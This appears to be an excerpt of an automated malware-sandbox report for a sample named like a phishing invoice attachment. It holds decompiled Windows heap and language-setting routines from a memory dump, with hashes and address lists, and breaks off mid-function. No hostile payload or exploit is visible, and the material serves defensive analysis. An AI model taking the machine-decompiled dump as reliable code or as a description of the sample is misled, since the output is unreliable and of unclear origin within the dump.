0x00b0b91b
0x00b0b91b
0x00000000
0x00b0b910

Strings

HEAP[%wZ]: , xrefs: 00B52C72
HEAP: , xrefs: 00B52C7F
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 00B52C8A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: d9af925c33941fb73028f841e7fb4b002147ed464ad0bee38d5fb8786c5fa241
Instruction ID: 1bb735a188a96fa01d46814aa435173c0a6ddf7e5b157165562d3a301a6a0496
Opcode Fuzzy Hash: d9af925c33941fb73028f841e7fb4b002147ed464ad0bee38d5fb8786c5fa241
Instruction Fuzzy Hash: 3311BE313166029FDB28EB15C495F3ABBE5EB40721F2485AEE50ACB2A1EB30D844D651

Uniqueness

Uniqueness Score: -1.00%

Function 00B1FAB0, Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B1FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00AFEEF0(0xbd7b60);
					_t134 =  *0xbd7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xbd7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xbd7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00AF6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00AF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B88938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00AEB150();
													}
													_t116 = E00B86D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00AF75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xbd8638; // 0x0
																	_t122 = L00AF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00AF76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00AF76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00B1FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00AF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00B1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00B1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00B1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00B1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00B1FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xbd7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xbd7b84 = _t75;
						_t73 = E00AFEB70(_t134, 0xbd7b60);
						if( *0xbd7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00AFFF60( *0xbd7b20);
							}
						}
						goto L5;
					}
				}
			}

0x00b1fab0
0x00b1fab2
0x00b1fab3
0x00b1fab4
0x00b1fabc
0x00b1fac0
0x00b1fb14
0x00b1fb17
0x00b1fac2
0x00b1fac8
0x00b1facd
0x00b1fad3
0x00b1fad3
0x00b1fadd
0x00b1fb18
0x00b1fb1b
0x00b1fb1d
0x00b1fb1e
0x00b1fb1f
0x00b1fb20
0x00b1fb21
0x00b1fb22
0x00b1fb23
0x00b1fb24
0x00b1fb25
0x00b1fb26
0x00b1fb27
0x00b1fb28
0x00b1fb29
0x00b1fb2a
0x00b1fb2b
0x00b1fb2c
0x00b1fb2d
0x00b1fb2e
0x00b1fb2f
0x00b1fb3a
0x00b1fb3b
0x00b1fb3e
0x00b1fb41
0x00b1fb44
0x00b1fb47
0x00b1fb4a
0x00b1fb4d
0x00b1fb53
0x00b5bdcb
0x00b5bdcb
0x00b1fb59
0x00b1fb5b
0x00b1fb5b
0x00b1fb5e
0x00b5bdd5
0x00b5bdd8
0x00000000
0x00b5bdda
0x00000000
0x00b5bdda
0x00b1fb64
0x00b1fb64
0x00b1fb64
0x00b1fb67
0x00b1fb6e
0x00b1fb70
0x00b1fb72
0x00000000
0x00b1fb78
0x00b1fb7a
0x00b1fb7a
0x00b1fb7d
0x00b1fb80
0x00b5bddf
0x00b5bde1
0x00000000
0x00b5bde3
0x00000000
0x00b5bde3
0x00b1fb86
0x00b1fb86
0x00b1fb86
0x00b1fb8b
0x00b1fb90
0x00b1fb92
0x00b1fb94
0x00b1fb9a
0x00b1fb9b
0x00b1fba1
0x00b5bde8
0x00b5bdeb
0x00b5bded
0x00b5beb5
0x00b5beb5
0x00b5bebb
0x00b5bebd
0x00b5bec3
0x00b5bed2
0x00b5bedd
0x00b5bedd
0x00b5beed
0x00000000
0x00b5bdf3
0x00b5bdfe
0x00b5be06
0x00b5be0b
0x00b5be0d
0x00b5be0f
0x00b5be14
0x00b5be19
0x00b5be20
0x00b5be25
0x00b5be27
0x00b5be35
0x00b5be39
0x00b5be46
0x00b5be4f
0x00b5be54
0x00b5be56
0x00b5bef8
0x00b5bef8
0x00000000
0x00b5be5c
0x00b5be5c
0x00b5be60
0x00000000
0x00b5be66
0x00b5be66
0x00b5be7f
0x00b5be84
0x00b5be87
0x00b5be89
0x00b5be8b
0x00b5be99
0x00b5be9d
0x00b5bea0
0x00b5beac
0x00b5beaf
0x00b5beb1
0x00b5beb3
0x00b5beb3
0x00000000
0x00b5bea2
0x00b5bea2
0x00000000
0x00b5bea2
0x00b5be8d
0x00b5be8d
0x00b5be92
0x00000000
0x00b5be92
0x00b5be8b
0x00b5be60
0x00b5be3b
0x00b5be3b
0x00b5be3e
0x00000000
0x00b5be40
0x00b5be40
0x00b5be44
0x00000000
0x00000000
0x00000000
0x00000000
0x00b5be44
0x00b5be3e
0x00b5be29
0x00b5be29
0x00000000
0x00b5be29
0x00b5be27
0x00000000
0x00b1fba7
0x00b1fba7
0x00b1fbab
0x00b5bf02
0x00b1fbb1
0x00b1fbb1
0x00b1fbb8
0x00b1fbbd
0x00b1fbbd
0x00b1fbbf
0x00b1fbbf
0x00b1fbc5
0x00b1fbcb
0x00b1fbf8
0x00b1fbf8
0x00b1fbfa
0x00000000
0x00b1fc00
0x00b1fc00
0x00b1fc03
0x00000000
0x00b1fc09
0x00b1fc09
0x00b1fc0f
0x00b1fc15
0x00b1fc23
0x00b1fc23
0x00b1fc25
0x00b1fc27
0x00b1fc75
0x00b1fc7c
0x00b1fc84
0x00000000
0x00b1fc29
0x00b1fc29
0x00b1fc2d
0x00b1fc30
0x00b5bf0f
0x00000000
0x00b1fc36
0x00b1fc38
0x00b1fc3b
0x00b1fc41
0x00b5bf17
0x00b5bf19
0x00b5bf48
0x00b5bf4b
0x00000000
0x00b5bf1b
0x00b5bf22
0x00b5bf24
0x00b5bf26
0x00000000
0x00b5bf2c
0x00b5bf37
0x00b5bf39
0x00b5bf3b
0x00000000
0x00b5bf41
0x00b5bf41
0x00b5bf41
0x00b5bf41
0x00b5bf45
0x00000000
0x00b5bf45
0x00b5bf3b
0x00b5bf26
0x00000000
0x00b1fc47
0x00b1fc47
0x00b1fc49
0x00b1fcb2
0x00b1fcb4
0x00b1fcb6
0x00b1fcdc
0x00b1fcdc
0x00000000
0x00b1fcb8
0x00b1fcc3
0x00b1fcc5
0x00b1fcc7
0x00000000
0x00b1fcc9
0x00b1fcc9
0x00b1fccd
0x00000000
0x00b1fccd
0x00b1fcc7
0x00000000
0x00b1fc4b
0x00b1fc4b
0x00b1fc4e
0x00b1fc4e
0x00b1fc51
0x00b1fc51
0x00b1fc54
0x00b1fc5a
0x00b1fc5c
0x00b1fc5f
0x00b1fc61
0x00b1fc63
0x00b1fc65
0x00b1fc67
0x00b1fc6e
0x00b1fc72
0x00b1fc72
0x00b1fc72
0x00b1fc72
0x00b1fc67
0x00b1fc61
0x00000000
0x00b1fc5a
0x00b1fc49
0x00b1fc41
0x00b1fc30
0x00b1fc27
0x00b1fc03
0x00b1fbcd
0x00b1fbd3
0x00b1fbd9
0x00b1fbdc
0x00b1fbde
0x00b1fc99
0x00b1fc9b
0x00b1fc9d
0x00b1fcd5
0x00b1fcd5
0x00b1fc89
0x00b1fc89
0x00000000
0x00b1fc9f
0x00b1fc9f
0x00b1fca3
0x00000000
0x00b1fca3
0x00000000
0x00b1fbe4
0x00b1fbe4
0x00b1fbe4
0x00b1fbe4
0x00b1fbe9
0x00b1fbf2
0x00000000
0x00b1fbf2
0x00b1fbde
0x00b1fbcb
0x00b1fbab
0x00b1fc8b
0x00b1fc8b
0x00b1fc8c
0x00b1fb80
0x00b1fb72
0x00b1fb5e
0x00b1fc8d
0x00b1fc91
0x00b1fadf
0x00b1fadf
0x00b1fae1
0x00b1fae4
0x00b1fae7
0x00b1faec
0x00b1faf8
0x00b1fb00
0x00b1fb07
0x00b1fb0f
0x00b1fb0f
0x00b1fb07
0x00000000
0x00b1faf8
0x00b1fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B5BE0F
h2h, xrefs: 00B1FAF1

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$h2h
API String ID: 0-388914793
Opcode ID: b8630fe8982014cc555140d96c810520704e0958dcf8e5d45c8517ea8395d88f
Instruction ID: 03a71fa6c65f77ba2e1c2f75273ee89cc3524d1ef50e9e33b9535c40eab950f7
Opcode Fuzzy Hash: b8630fe8982014cc555140d96c810520704e0958dcf8e5d45c8517ea8395d88f
Instruction Fuzzy Hash: 80A11431B0060A9BDB25DB68C451BFAB3E5EF48711F5445FAE902CB690EB30DC85DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00BAE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00BABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00BABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00BAAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00B29730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00BAA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00BAA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00B29730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00BAA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00BAA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00B02280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00AFB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00AFFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00B07D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00B9FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00bae547
0x00bae549
0x00bae54f
0x00bae553
0x00bae557
0x00bae55a
0x00bae55c
0x00bae55f
0x00bae561
0x00bae567
0x00bae56b
0x00bae7e2
0x00000000
0x00bae571
0x00bae575
0x00bae577
0x00bae57b
0x00bae57c
0x00bae57d
0x00bae57e
0x00bae57f
0x00bae588
0x00bae58f
0x00bae591
0x00bae592
0x00bae592
0x00bae596
0x00bae59e
0x00bae5a0
0x00bae5a6
0x00bae61d
0x00bae61d
0x00bae621
0x00bae623
0x00bae630
0x00bae630
0x00bae7e6
0x00bae7eb
0x00bae7ed
0x00bae7f4
0x00bae7fa
0x00bae7ff
0x00bae7ff
0x00bae80a
0x00bae812
0x00bae812
0x00bae5ab
0x00bae5b4
0x00bae5b9
0x00bae5be
0x00bae5c0
0x00bae5c2
0x00bae5c8
0x00bae5c9
0x00bae5cb
0x00bae5cc
0x00bae5d5
0x00bae5e4
0x00bae5f1
0x00bae5f8
0x00bae5f8
0x00bae5d5
0x00bae602
0x00bae616
0x00bae63d
0x00bae644
0x00bae64d
0x00bae652
0x00bae657
0x00bae659
0x00bae65b
0x00bae661
0x00bae662
0x00bae664
0x00bae665
0x00bae66e
0x00bae67d
0x00bae68a
0x00bae691
0x00bae691
0x00bae66e
0x00bae6b0
0x00000000
0x00bae6b6
0x00bae6bd
0x00bae6c7
0x00bae6d7
0x00bae6d9
0x00bae6db
0x00bae6de
0x00bae6e3
0x00bae6f3
0x00bae6fc
0x00bae700
0x00bae700
0x00bae704
0x00bae70a
0x00bae70a
0x00bae713
0x00bae716
0x00bae719
0x00bae720
0x00bae761
0x00bae76b
0x00bae774
0x00bae77a
0x00bae77a
0x00bae78a
0x00bae791
0x00bae799
0x00bae79b
0x00bae79f
0x00bae7aa
0x00bae7c0
0x00bae7ac
0x00bae7b2
0x00bae7b9
0x00bae7b9
0x00bae7c7
0x00bae806
0x00000000
0x00bae7c9
0x00bae7d1
0x00bae7d8
0x00000000
0x00bae7d8
0x00000000
0x00000000
0x00bae722
0x00bae72e
0x00bae748
0x00bae74c
0x00bae754
0x00bae756
0x00bae75c
0x00bae75c
0x00000000
0x00bae75c
0x00bae758
0x00bae758
0x00000000
0x00bae758
0x00bae750
0x00000000
0x00000000
0x00bae752
0x00000000
0x00bae752
0x00bae730
0x00bae735
0x00bae73d
0x00bae73f
0x00000000
0x00000000
0x00bae741
0x00bae741
0x00000000
0x00bae741
0x00bae739
0x00000000
0x00000000
0x00bae73b
0x00000000
0x00bae73b
0x00bae722
0x00bae720
0x00bae6b0
0x00bae618
0x00000000
0x00bae618

Strings

`, xrefs: 00BAE5D7
`, xrefs: 00BAE670

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 3f3652240223a35a8707bec12d95fddfe9e3ebf84f53086a8f63f65d2efbb239
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 86918E316083429FE724CE29C941B2BB7E5EF85714F14896DF9A9CB281E774ED04CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B651BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xbc05f0);
				E00B3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B653CA(0);
						return E00B3D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00B2F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00B03690(1, _t117, 0xac1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00B2AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
